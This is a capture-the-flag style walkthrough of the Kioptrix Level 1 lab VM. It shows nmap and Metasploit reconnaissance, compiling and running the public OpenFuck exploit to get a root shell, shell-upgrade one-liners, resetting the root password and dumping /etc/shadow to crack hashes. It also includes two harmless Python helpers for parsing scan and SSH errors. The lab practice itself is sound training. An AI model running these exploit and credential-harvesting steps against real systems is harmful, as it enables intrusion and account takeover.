So, I'm doing a course on Udemy, https://www.udemy.com/course/practical-ethical-hacking/learn/lecture/17084434?start=705#overview
And one of the target machines was the Kioptrix VM, so how do you solve it? It's actually quite easy, as it should be for a beginner VM, but let me give you some pointers if you want to try it yourself :) SPOILER, SOLUTION PROVIDED !!
So, if you've read the spoiler at the start of the tutorial and want to jump into some hacking, let's do it. I won't show you how to set up a Kali VM / Kali box; you should be able to do this yourself, and while you're at it, install VirtualBox as well, you'll need it later.
When you've finished installing Kali and VirtualBox, head on over and download the VM: https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
Set up a VM with bridged networking, so it gets an IP address from your router in the same range as your workstation, and fire up the VM.
Find it with nmap so you know the IP address of the VM, and let's start having some fun. First, let's run nmap against it.
nmap -T4 -p- -A TARGET_IP (timing template 4, all ports, all details)
Here we launch nmap with timing template 4, scan all ports from 1 to 65535, and request OS and service details for maximum results.
Let it run until it's done, and you should get something like this.
Nmap scan report for 10.0.0.xxx
Host is up (0.0021s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
32768/tcp open filenet-tms
MAC Address: 08:00:27:06:5A:4F (Oracle VirtualBox virtual NIC)
If you look a little closer at the output from nmap, you'll see some more details, namely:
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
So, we've got Apache 1.3.20 installed on a Red Hat system. That's a start. We've got SSH, but we don't know what Samba version is running, hmm. Maybe the Metasploit Framework has a scanner for that in its aux modules? Let's go take a look. Fire up msfconsole.
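The reading the text does by hand above (pick the product, version and OS hint out of nmap's VERSION column) is easy to automate when you scan more than one lab box. As an added example that is not part of the course or the original post, here is a small Python parser for nmap's normal output; the sample report is constructed from the scan lines above, and the ports the page shows without a version column are left exactly as listed, so they come back with no product.

```python
import re

# Constructed sample input: the scan lines from the walkthrough above, with the
# two version lines the text points out. Ports the page lists without a version
# column are kept exactly as shown there.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.0.0.105
Host is up (0.0021s latency).
Not shown: 994 closed ports
PORT      STATE SERVICE      VERSION
22/tcp    open  ssh          OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http         Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
443/tcp   open  https
32768/tcp open  filenet-tms
MAC Address: 08:00:27:06:5A:4F (Oracle VirtualBox virtual NIC)
"""

# One "port/proto  state  service  [version ...]" line from nmap's normal output.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)"
    r"(?:\s+(?P<version>.*\S))?\s*$"
)
# Leading product name followed by the first version-looking token.
PRODUCT_VERSION = re.compile(r"^(?P<product>[^\d(]+?)\s+(?P<version>\d[\w.]*)")
# A parenthesised "(Something/Linux)" token such as "(Red-Hat/Linux)" hints at the OS.
OS_HINT = re.compile(r"\(([\w-]+/Linux)\)")


def parse_nmap_ports(report):
    """Return one dict per port line: port, proto, state, service, version."""
    found = []
    for raw in report.splitlines():
        m = PORT_LINE.match(raw.strip())
        if m is None:
            continue  # header, "Host is up", "MAC Address" and similar lines
        entry = m.groupdict()
        entry["port"] = int(entry["port"])
        entry["version"] = entry["version"] or ""
        found.append(entry)
    return found


def product_and_version(version_field):
    """'OpenSSH 2.9p2 (protocol 1.99)' -> ('OpenSSH', '2.9p2'); None if no version."""
    m = PRODUCT_VERSION.match(version_field)
    if m is None:
        return None
    return m.group("product").strip(), m.group("version")


def os_hint(version_field):
    """'... (Red-Hat/Linux) ...' -> 'Red-Hat/Linux'; None if nothing recognisable."""
    m = OS_HINT.search(version_field)
    return m.group(1) if m else None


def service_inventory(report):
    """Map port -> service, product, version and OS hint for every port line."""
    inventory = {}
    for entry in parse_nmap_ports(report):
        pv = product_and_version(entry["version"])
        inventory[entry["port"]] = {
            "service": entry["service"],
            "product": pv[0] if pv else None,
            "version": pv[1] if pv else None,
            "os_hint": os_hint(entry["version"]),
        }
    return inventory


if __name__ == "__main__":
    for port, info in sorted(service_inventory(SAMPLE_NMAP_OUTPUT).items()):
        print(f"{port:>6} {info['service']:<12} {info['product'] or '?'} "
              f"{info['version'] or ''} {info['os_hint'] or ''}".rstrip())
```

Feed it the saved output of an `nmap -A` run (`nmap -oN scan.txt ...`) and you get the same "Apache 1.3.20 on Red Hat" conclusion as a data structure, which is what you want when you keep an inventory of which lab hosts run which versions.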
msfconsole
msf6 > search aux smb
52 auxiliary/fuzzers/smb/smb_tree_connect normal No SMB Tree Connect Request Fuzzer
53 auxiliary/scanner/smb/smb_enumusers normal No SMB User Enumeration (SAM EnumUsers)
54 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
msf6 > use 54
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 10.0.0.105
rhosts => 10.0.0.105
msf6 auxiliary(scanner/smb/smb_version) > run
[*] 10.0.0.105:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional)
[*] 10.0.0.105:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] 10.0.0.105: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_version) >
So, we've got Samba 2.2.1a running. That's what we wanted to find out. Now we know we might be able to attack either Apache or Samba.
I wonder if we can connect to the Samba server, let's try it :)
smbclient -U '' \\\\TARGET_IP\\SHARE$
Try the IPC$ share; ADMIN$ won't work. You don't have access rights to the IPC$ share, but it will connect, so we know we can send traffic to the SMB port.
So we need an exploit for this, since we also assume SSH is locked down and we don't have credentials for it, not yet.
If you google around for a bit you will find something called OpenFuck; if not, you can download it directly:
git clone https://github.com/heltonWernik/OpenFuck.git
It's not compiled, so we need to do that, like this:
gcc -o OpenFuck OpenFuck.c -lcrypto
Now it's time for some fun. Run it with
./OpenFuck
Now it's going to give you a very long list of different targets, so pick the right one, since the return addresses are hardcoded per operating system and version. Kioptrix' is option 0x6b, so we run the exploit like this:
./OpenFuck 0x6b 10.0.0.xx -c 40
When it runs, it prints something like this:
ptrace-kmod.c:183:1: warning: no newline at end of file
[+] Attached to 2055
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
Check whether you got a shell by running a normal whoami command. Note that you only see the command's output, there is no prompt.
whoami
root
hostname
kioptrix.level1
So, we have a working shell, but it's not a "real" (interactive) shell. Can we do something about that? There are a couple of things we can try; run the following commands one by one and see if you get a proper shell.
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
# from within perl
exec "/bin/sh";
# from within ruby
exec "/bin/sh"
# from within lua
os.execute('/bin/sh')
# from within irb
exec "/bin/sh"
# from within vi
:!bash
:set shell=/bin/bash:shell
Sometimes you can spawn a real shell with these, depending on the system, but why not go for the easy win? Remember that SSH server? We didn't have credentials for it, and we don't need them now: we have a root shell. But what if we want to come back? We can add a user, or simply set a password we know for the root user.
passwd root
Type your new password, and while you're here, cat /etc/passwd and /etc/shadow, save the users' hashes, and try to crack them as a bonus.
Let's see if that SSH access works. SSH into the box, and you'll see you can't connect. But why? SSH is running..
ssh 10.0.0.xx
Unable to negotiate with 10.0.0.xx port 22: no matching key exchange method found. Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
So our client doesn't have those kex algorithms enabled; how do we solve that? Have a look at the man page for ssh or sshd_config. We need a parameter called -o KexAlgorithms=+
ssh root@10.0.0.xxx -o KexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1
Now it's bitching again, this time about ciphers
Unable to negotiate with 10.0.0.xxx port 22: no matching cipher found. Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se
See the first option, aes128-cbc? Let's try it and see if we can connect.
ssh root@10.0.0.xxx -o KexAlgorithms=+diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 -c aes128-cbc
The authenticity of host '10.0.0.xxx (10.0.0.xxx)' can't be established.
RSA key fingerprint is SHA256:VDo/h/SG4A6H+WPH3LsQqw1jwjyseGYq9nLeRWPCY/A.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.0.0.xxx' (RSA) to the list of known hosts.
root@10.0.0.xxx's password:
Bang, we're in :)
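The two "Unable to negotiate" errors above are the modern OpenSSH client refusing algorithms it still has compiled in but has disabled by default, which is why the "+" form re-enables them. Rather than guessing the flags by hand each time, the added Python example below (not part of the course or the original post) parses those error lines, intersects the server's offer with what the client reports via `ssh -Q kex` and `ssh -Q cipher`, and renders the result either as `-o` flags or as a `~/.ssh/config` Host stanza. The sample error lines and the client support lists are constructed stand-ins for that output; the Host stanza is the form worth keeping, because it limits the weak SHA-1 key exchange and CBC ciphers to this one lab host instead of enabling them for every connection.

```python
import re

# Constructed sample input: the two "Unable to negotiate" errors from the
# walkthrough above, as a current OpenSSH client prints them against the
# OpenSSH 2.9 sshd on the VM.
SAMPLE_ERRORS = [
    "Unable to negotiate with 10.0.0.105 port 22: no matching key exchange method found. "
    "Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1",
    "Unable to negotiate with 10.0.0.105 port 22: no matching cipher found. "
    "Their offer: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,"
    "aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc@lysator.liu.se",
]

# Constructed stand-in for what `ssh -Q kex` and `ssh -Q cipher` print on the
# client (everything compiled in, including algorithms disabled by default).
# On a real client, read those commands instead of hard-coding the lists.
CLIENT_SUPPORT = {
    "KexAlgorithms": ["curve25519-sha256", "diffie-hellman-group-exchange-sha256",
                      "diffie-hellman-group-exchange-sha1", "diffie-hellman-group14-sha1",
                      "diffie-hellman-group1-sha1"],
    "Ciphers": ["aes128-ctr", "aes256-gcm@openssh.com", "aes128-cbc", "aes256-cbc", "3des-cbc"],
}

# "no matching <thing> found. Their offer: a,b,c" and the ssh_config option it maps to.
NEGOTIATE_ERROR = re.compile(
    r"no matching (?P<what>key exchange method|cipher|host key type|MAC) found\. "
    r"Their offer: (?P<offer>\S+)"
)
OPTION_FOR = {
    "key exchange method": "KexAlgorithms",
    "cipher": "Ciphers",
    "host key type": "HostKeyAlgorithms",
    "MAC": "MACs",
}


def parse_negotiation_error(line):
    """Return (ssh_config option, [algorithms the server offered]) or None."""
    m = NEGOTIATE_ERROR.search(line)
    if m is None:
        return None
    return OPTION_FOR[m.group("what")], m.group("offer").split(",")


def usable(offered, client_supported):
    """Offered algorithms the client can also do, kept in the server's order."""
    supported = set(client_supported)
    return [a for a in offered if a in supported]


def negotiate_options(errors, client_support):
    """Map each failed negotiation to the list of algorithms to re-enable with '+'."""
    options = {}
    for line in errors:
        parsed = parse_negotiation_error(line)
        if parsed is None:
            continue  # not a negotiation failure, e.g. a host-key warning line
        option, offered = parsed
        common = usable(offered, client_support.get(option, []))
        if not common:
            raise ValueError(f"no {option} in common; server offers {offered}")
        options[option] = common
    return options


def as_cli_flags(options):
    """Render as '-oName=+a,b' flags for a one-off ssh invocation."""
    return ["-o{}=+{}".format(name, ",".join(algs)) for name, algs in options.items()]


def as_ssh_config(alias, hostname, user, options):
    """Render a ~/.ssh/config stanza so the weak algorithms apply to this host only."""
    lines = [f"Host {alias}", f"    HostName {hostname}", f"    User {user}"]
    lines += ["    {} +{}".format(name, ",".join(algs)) for name, algs in options.items()]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    opts = negotiate_options(SAMPLE_ERRORS, CLIENT_SUPPORT)
    print("ssh", " ".join(as_cli_flags(opts)), "root@10.0.0.105")
    print(as_ssh_config("kioptrix", "10.0.0.105", "root", opts), end="")
```

If a newer client also complains with "no matching host key type found. Their offer: ssh-rsa", the same parser turns that into a HostKeyAlgorithms entry, provided `ssh -Q key` on your client still lists ssh-rsa; when an algorithm is missing from the client entirely, the function raises instead of emitting an option that ssh would reject.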
That's it, we just hacked into a Red Hat box. So now you know a little about how you pentest a box; go forth with the others from vulnhub :)
Much Happy Hacking :)